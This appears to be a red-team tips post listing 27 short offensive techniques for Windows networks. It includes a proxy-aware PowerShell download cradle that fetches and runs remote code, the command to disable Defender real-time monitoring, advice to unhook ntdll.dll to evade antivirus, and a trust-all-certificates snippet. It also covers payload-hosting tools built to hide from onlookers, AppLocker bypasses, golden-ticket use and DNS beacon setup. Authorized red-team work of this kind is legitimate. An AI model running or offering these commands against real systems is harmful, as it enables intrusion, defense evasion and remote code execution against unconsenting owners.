#0: Need good blog posts/references? consider ired.team ijustwannared.team XPN’s Blog https://offensivedefence.co.uk/ and Vincent Yui’s Red Team Tips
#1 The standard powershell downloadcradle (IEX New-Object….) is NOT proxy aware. A far superior alternative is the following one liner:
$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")
#2 Feeling like you hit a dead end in your enumeration? Consider SQL servers… They are often overlooked, and can easily be exploited for RCE (think potato exploits). NETSPI is an expert in DB exploitation. https://github.com/NetSPI I highly recommend powerupsql if you can manage to load powershell undetected.
#3 The command to list AV products is
powershell:
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
WMIC:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
#4 Only got CIFS TGS? you can still use sc
to enable/disable/register new services on remote computers.
#5 The command to disable realtimonitoring is Set-MpPreference -DisableRealtimeMonitoring $true
This is NOT opsec safe (duh).
#6 unhook ntdll.dll and all your AV problems go away 🙂
A good starting point is
https://ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
#7 In my honest opinion, https://github.com/skelsec/pypykatz is superior to mimikatz itself for reading out dumps and registry keys. It’s python based so works cross OS. pretty damn sweet.
#8. Don’t use SimpleHTTPServer anymore, use the much better UpDog instead (it has uploading functionalities!) https://github.com/sc0tfree/updog
#9. Pwndrop is another nice alternative for quickly hosting payloads, and it has facade options to prevent snooping eyes. https://github.com/kgretzky/pwndrop
#10. Need a powershell web server for some reason? use this one! https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466
it has script execution,command execution, and download functionalities
#11. You need quote escapes in powershell? there are a few different options, either use backslash (\) to escape quotes or use encodedcommands instead. pro tip, chaining powershell commands can be done, even incoded by just using “;” as a separator for commands. ex. whoami;whoami /priv
#12. Ever in a restricted environment, or using a tool that needs an argument to spawn a new shell? use .bat files or .cmd files like so:
@echo off
powershell.exe -noexit ## or any other powershell command you need.
#13. powershell script to c#? no problem! https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs
#14. need to get rid of applocker (after you bypassed it initially)? https://github.com/api0cradle/AppLocker-Stuff
#15. Using Costura to package your c#? @cobbr says “Be sure to install Costura v1.6.2 to work with .NET Framework v3.5 assemblies”
#16. @0gtweet tweeted an interesting thing: ” an undocumented -encodedarguments PowerShell parameter. It may be shortened to “ea” or “encodeda”.
#17. @mpgn_x64 said: Struggling with golden ticket and access denied ? Use ‘klist add_bind’ command after injecting your ticket with mimikatz or rubeus. (tweet)
#18. Ever needed to know what regkey is being edited by mdm or gpo? check this site: https://getadmx.com/?Category=Windows_10_2016
#19. You’ll need local admin rights to change registry keys in HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\
#20. you can pass cmd args from explorer window, for example

#21 when using GadgetToJScript, use x86 payloads! also specifying the assembly is easier than compiling the CSharp as it imports the correct DLL’s automagically
#22 poweshell version 2 but having annoying SSL errors?
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072)
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
public bool CheckValidationResult(
ServicePoint srvPoint, X509Certificate certificate,
WebRequest request, int certificateProblem) {
return true;
}
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy
#23 want to enum rdp sessions? use the qwinsta command
#24 want a nice overview of outdated operating systems when you have a bloodhound dump? use the neo4j webapplication and run this query:
MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*indows.*(2000|2003|2008|7|xp|vista|me).*' AND H.enabled = true RETURN H.name,H.operatingsystem
#25 when configuring a DNS beacon, do not point the NS record to the IP, create an A record first, point the A record to the IP, then point the NS record to the A record.
#26 if you install another AV on a machine that has MDE installed it will turn itself off, but the health will remain Active. ¯\_(ツ)_/¯ could be interesting in a red team edge case I guess. https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware… tip provided by @0xThiebaut
#27 wanna know which logon types generate creds that can be reused on target? (avoid double hop):
https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/reference-tools-logon-types